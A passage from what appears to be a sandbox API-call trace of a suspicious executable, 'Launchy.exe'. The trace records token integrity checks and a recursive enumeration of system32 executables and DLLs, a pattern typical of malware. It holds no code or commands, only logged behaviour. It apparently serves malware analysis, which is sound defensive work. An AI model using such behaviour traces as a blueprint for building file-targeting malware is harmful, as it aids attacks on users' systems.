hKey=0xc4, dwIndex=0x53, lpName=0x18fd58, cchName=0x104 | out: lpName="winresume") returned 0x103 [0030.625] RegCloseKey (hKey=0xc4) returned 0x0 [0030.625] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Launchy.exe\" " [0030.625] StrChrW (lpStart="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Launchy.exe\" ", wMatch=0x22) returned="\" " [0030.625] StrChrW (lpStart="\" ", wMatch=0x20) returned=" " [0030.625] StrTrimW (in: psz="", pszTrimChars=" " | out: psz="") returned 0 [0030.625] GetVersion () returned 0x1db10106 [0030.625] GetCurrentProcess () returned 0xffffffff [0030.625] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20008, TokenHandle=0x18ff24 | out: TokenHandle=0x18ff24*=0xc4) returned 1 [0030.625] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x14, TokenInformation=0x18ff1c, TokenInformationLength=0x4, ReturnLength=0x18ff28 | out: TokenInformation=0x18ff1c, ReturnLength=0x18ff28) returned 1 [0030.626] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x18ff28 | out: TokenInformation=0x0, ReturnLength=0x18ff28) returned 0 [0030.626] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x6e84f0 [0030.626] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x19, TokenInformation=0x6e84f0, TokenInformationLength=0x14, ReturnLength=0x18ff28 | out: TokenInformation=0x6e84f0, ReturnLength=0x18ff28) returned 1 [0030.626] GetSidSubAuthorityCount (pSid=0x6e84f8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 0x6e84f9 [0030.626] GetSidSubAuthority (pSid=0x6e84f8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000), nSubAuthority=0x0) returned 0x6e8500 [0030.626] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e84f0 | out: hHeap=0x6d0000) returned 1 [0030.626] CloseHandle (hObject=0xc4) returned 1 [0030.626] CommandLineToArgvW (in: lpCmdLine="", pNumArgs=0x18ff64 | out: pNumArgs=0x18ff64) returned 0x6ee878*="C:\\Users\\5p5NrGJn0jS" [0030.626] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff1c | out: lpSystemTimeAsFileTime=0x18ff1c*(dwLowDateTime=0xbb9a9b20, dwHighDateTime=0x1d64ac6)) [0030.626] GetWindowsDirectoryW (in: lpBuffer=0x0, uSize=0x0 | out: lpBuffer=0x0) returned 0xb [0030.626] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x220) returned 0x6ee8f0 [0030.626] GetWindowsDirectoryW (in: lpBuffer=0x6ee8f0, uSize=0xc | out: lpBuffer="C:\\Windows") returned 0xa [0030.626] lstrcpyW (in: lpString1=0x6ee906, lpString2="system32" | out: lpString1="system32") returned="system32" [0030.626] lstrlenW (lpString="C:\\Windows\\system32") returned 19 [0030.626] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xfffe) returned 0x6eeb18 [0030.627] lstrlenW (lpString="*.exe|*.dll") returned 11 [0030.627] lstrlenW (lpString=0x0) returned 0 [0030.627] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1a) returned 0x6ee0b8 [0030.627] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x250) returned 0x6feb20 [0030.627] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\*", lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xc893570, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xc893570, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6fed78 [0030.628] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xc893570, ftLastAccessTime.dwHighDateTime=0x1d35d06, ftLastWriteTime.dwLowDateTime=0xc893570, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0030.628] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e9f4a12, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x229791ec, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e9f4a12, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0409", cAlternateFileName="")) returned 1 [0030.628] lstrlenW (lpString="0409") returned 4 [0030.628] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x250) returned 0x6ffdc0 [0030.628] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\0409\\*", lpFindFileData=0x6ffdc0 | out: lpFindFileData=0x6ffdc0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e9f4a12, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x229791ec, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e9f4a12, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x700018 [0030.628] FindNextFileW (in: hFindFile=0x700018, lpFindFileData=0x6ffdc0 | out: lpFindFileData=0x6ffdc0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e9f4a12, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x229791ec, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e9f4a12, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0030.629] FindNextFileW (in: hFindFile=0x700018, lpFindFileData=0x6ffdc0 | out: lpFindFileData=0x6ffdc0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e9f4a12, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x229791ec, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e9f4a12, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0030.629] FindClose (in: hFindFile=0x700018 | out: hFindFile=0x700018) returned 1 [0030.629] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ffdc0 | out: hHeap=0x6d0000) returned 1 [0030.629] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8cc6e3c, ftCreationTime.dwHighDateTime=0x1c9ea10, ftLastAccessTime.dwLowDateTime=0xc8cc6e3c, ftLastAccessTime.dwHighDateTime=0x1c9ea10, ftLastWriteTime.dwLowDateTime=0xc8cecf9c, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0x867, dwReserved0=0x0, dwReserved1=0x0, cFileName="12520437.cpx", cAlternateFileName="")) returned 1 [0030.629] lstrlenW (lpString="12520437.cpx") returned 12 [0030.629] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c98834, ftCreationTime.dwHighDateTime=0x1ca040b, ftLastAccessTime.dwLowDateTime=0x4c98834, ftLastAccessTime.dwHighDateTime=0x1ca040b, ftLastWriteTime.dwLowDateTime=0xc8d130fc, ftLastWriteTime.dwHighDateTime=0x1c9ea10, nFileSizeHigh=0x0, nFileSizeLow=0x8b9, dwReserved0=0x0, dwReserved1=0x0, cFileName="12520850.cpx", cAlternateFileName="")) returned 1 [0030.629] lstrlenW (lpString="12520850.cpx") returned 12 [0030.629] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8699fd85, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8699fd85, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x869c5ee6, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x20200, dwReserved0=0x0, dwReserved1=0x0, cFileName="aaclient.dll", cAlternateFileName="")) returned 1 [0030.629] lstrlenW (lpString="aaclient.dll") returned 12 [0030.629] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9a) returned 0x6ffdc0 [0030.629] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93cbbe2a, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x93cbbe2a, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x93d080eb, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x38e200, dwReserved0=0x0, dwReserved1=0x0, cFileName="accessibilitycpl.dll", cAlternateFileName="")) returned 1 [0030.629] lstrlenW (lpString="accessibilitycpl.dll") returned 20 [0030.629] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xaa) returned 0x6ffe68 [0030.629] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89c04678, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0x89c04678, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0xf0e28ef0, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0x9a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACCTRES.dll", cAlternateFileName="")) returned 1 [0030.629] lstrlenW (lpString="ACCTRES.dll") returned 11 [0030.629] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x98) returned 0x6fff20 [0030.630] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x10f51da3, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0x10f51da3, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x7d217650, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="acledit.dll", cAlternateFileName="")) returned 1 [0030.630] lstrlenW (lpString="acledit.dll") returned 11 [0030.630] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x98) returned 0x6fffc0 [0030.630] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d698b07, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0x7d698b07, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0x7d217650, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1ea00, dwReserved0=0x0, dwReserved1=0x0, cFileName="aclui.dll", cAlternateFileName="")) returned 1 [0030.630] lstrlenW (lpString="aclui.dll") returned 9 [0030.630] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x94) returned 0x700060 [0030.630] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d3bd2e0, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x9d3bd2e0, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x9d3bd2e0, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xb200, dwReserved0=0x0, dwReserved1=0x0, cFileName="acppage.dll", cAlternateFileName="")) returned 1 [0030.630] lstrlenW (lpString="acppage.dll") returned 11 [0030.630] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x98) returned 0x700100 [0030.630] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3c37918, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb3c37918, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb3c5da79, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0xb5c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="ActionCenter.dll", cAlternateFileName="")) returned 1 [0030.630] lstrlenW (lpString="ActionCenter.dll") returned 16 [0030.630] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa2) returned 0x7001a0 [0030.630] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb3c5da79, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb3c5da79, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb3c5da79, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x83400, dwReserved0=0x0, dwReserved1=0x0, cFileName="ActionCenterCPL.dll", cAlternateFileName="")) returned 1 [0030.630] lstrlenW (lpString="ActionCenterCPL.dll") returned 19 [0030.630] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa8) returned 0x700250 [0030.630] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9adf355b, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x9adf355b, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x9ae196bb, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x31800, dwReserved0=0x0, dwReserved1=0x0, cFileName="activeds.dll", cAlternateFileName="")) returned 1 [0030.630] lstrlenW (lpString="activeds.dll") returned 12 [0030.631] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9a) returned 0x700300 [0030.631] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xedc36d00, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0xedc36d00, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0xedb524c6, ftLastWriteTime.dwHighDateTime=0x1ca0412, nFileSizeHigh=0x0, nFileSizeLow=0x1b400, dwReserved0=0x0, dwReserved1=0x0, cFileName="activeds.tlb", cAlternateFileName="")) returned 1 [0030.631] lstrlenW (lpString="activeds.tlb") returned 12 [0030.631] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8a81bf79, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8a81bf79, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8a8420d9, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x4ba00, dwReserved0=0x0, dwReserved1=0x0, cFileName="actxprxy.dll", cAlternateFileName="")) returned 1 [0030.631] lstrlenW (lpString="actxprxy.dll") returned 12 [0030.631] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9a) returned 0x7003a8 [0030.631] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x554a4ec2, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0x554a4ec2, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0x65268bd0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x9800, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdapterTroubleshooter.exe", cAlternateFileName="")) returned 1 [0030.631] lstrlenW (lpString="AdapterTroubleshooter.exe") returned 25 [0030.631] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb4) returned 0x700450 [0030.631] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa343f8c0, ftCreationTime.dwHighDateTime=0x1ca0413, ftLastAccessTime.dwLowDateTime=0xa343f8c0, ftLastAccessTime.dwHighDateTime=0x1ca0413, ftLastWriteTime.dwLowDateTime=0x7d856840, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="admparse.dll", cAlternateFileName="")) returned 1 [0030.631] lstrlenW (lpString="admparse.dll") returned 12 [0030.631] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9a) returned 0x700510 [0030.631] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb1c6129e, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb1c6129e, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb1c873fe, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x6b000, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdmTmpl.dll", cAlternateFileName="")) returned 1 [0030.631] lstrlenW (lpString="AdmTmpl.dll") returned 11 [0030.631] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x98) returned 0x7005b8 [0030.632] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2f573ca, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0xe2f573ca, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x7dbea0b0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xc200, dwReserved0=0x0, dwReserved1=0x0, cFileName="adprovider.dll", cAlternateFileName="")) returned 1 [0030.632] lstrlenW (lpString="adprovider.dll") returned 14 [0030.632] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9e) returned 0x700658 [0030.632] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8b68a4f3, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8b68a4f3, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8b68a4f3, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2da00, dwReserved0=0x0, dwReserved1=0x0, cFileName="adsldp.dll", cAlternateFileName="")) returned 1 [0030.632] lstrlenW (lpString="adsldp.dll") returned 10 [0030.632] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x96) returned 0x700700 [0030.632] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9f1b122, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0xf9f1b122, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x7dccd180, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x31800, dwReserved0=0x0, dwReserved1=0x0, cFileName="adsldpc.dll", cAlternateFileName="")) returned 1 [0030.632] lstrlenW (lpString="adsldpc.dll") returned 11 [0030.632] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x98) returned 0x7007a0 [0030.632] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf66b897d, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0xf66b897d, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x7dccd180, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x12e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="adsmsext.dll", cAlternateFileName="")) returned 1 [0030.632] lstrlenW (lpString="adsmsext.dll") returned 12 [0030.632] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9a) returned 0x700840 [0030.632] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfad634c2, ftCreationTime.dwHighDateTime=0x1ca0412, ftLastAccessTime.dwLowDateTime=0xfad634c2, ftLastAccessTime.dwHighDateTime=0x1ca0412, ftLastWriteTime.dwLowDateTime=0x7dcf4280, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x3fa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="adsnt.dll", cAlternateFileName="")) returned 1 [0030.632] lstrlenW (lpString="adsnt.dll") returned 9 [0030.632] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x94) returned 0x7008e8 [0030.632] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2fc81ff4, ftCreationTime.dwHighDateTime=0x1ca040f, ftLastAccessTime.dwLowDateTime=0x2fc81ff4, ftLastAccessTime.dwHighDateTime=0x1ca040f, ftLastWriteTime.dwLowDateTime=0xf1def050, ftLastWriteTime.dwHighDateTime=0x1ca041e, nFileSizeHigh=0x0, nFileSizeLow=0xa6200, dwReserved0=0x0, dwReserved1=0x0, cFileName="adtschema.dll", cAlternateFileName="")) returned 1 [0030.632] lstrlenW (lpString="adtschema.dll") returned 13 [0030.633] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9c) returned 0x700988 [0030.633] FindNextFileW (in: hFindFile=0x6fed78, lpFindFileData=0x6feb20 | out: lpFindFileData=0x6feb20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x8cdedaf6, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x8cdedaf6, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdvancedInstallers", cAlternateFileName="ADVANC~1")) returned 1 [0030.633] lstrlenW (lpString="AdvancedInstallers") returned 18 [0030.633] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x250) returned 0x700a30 [0030.633] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\AdvancedInstallers\\*", lpFindFileData=0x700a30 | out: lpFindFileData=0x700a30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x8cdedaf6, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x8cdedaf6, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x700c88 [0030.634] FindNextFileW (in: hFindFile=0x700c88, lpFindFileData=0x700a30 | out: lpFindFileData=0x700a30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe13712, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x8cdedaf6, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x8cdedaf6, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0030.634] FindNextFileW (in: hFindFile=0x700c88, lpFindFileData=0x700a30 | out: lpFindFileData=0x700a30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8eb80ed5, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x8eb80ed5, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x8eba7035, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1d600, dwReserved0=0x0, dwReserved1=0x0, cFileName="cmiadapter.dll", cAlternateFileName="")) returned 1 [0030.634] lstrlenW (lpString="cmiadapter.dll") returned 14 [0030.634] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc4) returned 0x701cd0 [0030.634] FindNextFileW (in: hFindFile=0x700c88, lpFindFileData=0x700a30 | out: lpFindFileData=0x700a30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x964c1054, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0x964c1054, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0x965595d5, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x1f2600, dwReserved0=0x0, dwReserved1=0x0, cFileName="cmiv2.dll", cAlternateFileName="")) returned 1 [0030.634] lstrlenW (lpString="cmiv2.dll") returned 9 [0030.634] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xba) returned 0x701da0 [0030.634] FindNextFileW (in: hFindFile=0x700c88, lpFindFileData=0x700a30 | out: lpFindFileData=0x700a30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbf919a2c, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0xbf919a2c, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0xacf3bdc0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x24e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="OEMHelpIns.dll", cAlternateFileName="")) returned 1 [0030.634] lstrlenW (lpString="OEMHelpIns.dll") returned 14 [0030.634] RtlAllocateHeap 